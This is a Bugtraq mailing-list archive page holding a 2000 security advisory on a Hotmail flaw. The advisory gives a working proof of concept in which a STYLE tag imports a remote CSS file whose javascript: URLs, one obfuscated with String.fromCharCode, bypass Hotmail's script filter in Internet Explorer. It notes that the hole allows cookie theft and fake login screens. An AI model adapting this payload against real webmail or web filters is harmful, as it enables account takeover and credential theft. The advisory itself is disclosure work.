Bugtraq mailing list archives
Hotmail security hole - injecting JavaScript in IE using "@import url(http://host/hostile.css)"
From: joro () NAT BG (Georgi Guninski)
Date: Mon, 24 Apr 2000 16:09:18 +0300
Georgi Guninski security advisory #11, 2000 Hotmail security hole - injecting JavaScript in IE using "@import url(http://host/hostile.css)" Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Hotmail allows executing JavaScript code in email messages using "@import url(http://host/hostile.css)", which may compromise user's Hotmail mailbox when viewed with Internet Explorer. Details: Several months ago in my Advisory #3, 2000 I alerted about a Hotmail bug with "@import url(javascript:...)". It was fixed, but now I found a similar bug. There is a new security flaw in Hotmail which allows injecting and executing JavaScript code in an email message using the the <STYLE> tag, @import and the "javascript:" protocol. This exploit works on Internet Explorer. Hotmail tries to filter JavaScript code for security reasons. Executing JavaScript when the user opens Hotmail email message allows for example displaying a fake login screen where the user enters his password which is then stolen. I don't want to make a scary demonstration, but it is also possible to read user's messages, to send messages from user's name and doing other mischief. It is also possible to get the cookie from Hotmail, which is dangerous. Hotmail deliberately escapes all JavaScript (it can escape) to prevent such attacks, but obviously there are holes. The following JavaScript is executed if embedded in a HTML message: ------------------------------------------- <STYLE type=text/css> @import url(http://www.nat.bg/~joro/test.css); </STYLE> ------------------------------------------- where http://www.nat.bg/~joro/test.css contains: ------------------------------------------- @import url(javascript:alert('JavaScript is executed')); @import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59))); ------------------------------------------- Workaround: Disable Active Scripting before viewing a Hotmail message or don't use IE NOTE: Do not ask me to crack Hotmail accounts, I do not do that. Copyright 2000 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro
Current thread:
- Microsoft Security Bulletin (MS00-026), (continued)
- Microsoft Security Bulletin (MS00-026) Microsoft Product Security (Apr 20)
- Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) TAKAGI, Hiromitsu (Apr 20)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Przemyslaw Frasunek (Apr 25)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Bill Fumerola (Apr 24)
- Re: freebsd libncurses overflow Theo de Raadt (Apr 26)
- Denial of Service Against pcAnywhere. Vacuum (Apr 25)
- Re: ZoneAlarm Gary Buckmaster (Apr 22)
- CVS DoS Michal Szymanski (Apr 23)
- Re: CVS DoS Kris Kennaway (Apr 24)
- Re: CVS DoS Kris Kennaway (Apr 24)
- finding Meeting Maker passwords using tcpdump mhpower () MIT EDU (Apr 24)
- ZoneAlarm Vulnerability Alfred Huger (Apr 25)
- Solaris Sparc 2.6 & 7 lp/lpset/lpstat root compromise exploit Laurent LEVIER (Apr 25)
- Re: Solaris Sparc 2.6 & 7 lp/lpset/lpstat root compromise exploit Casper Dik (Apr 26)
- Re: Solaris Sparc 2.6 & 7 lp/lpset/lpstat root compromise exploit Dimitri Avgoustakis (Apr 26)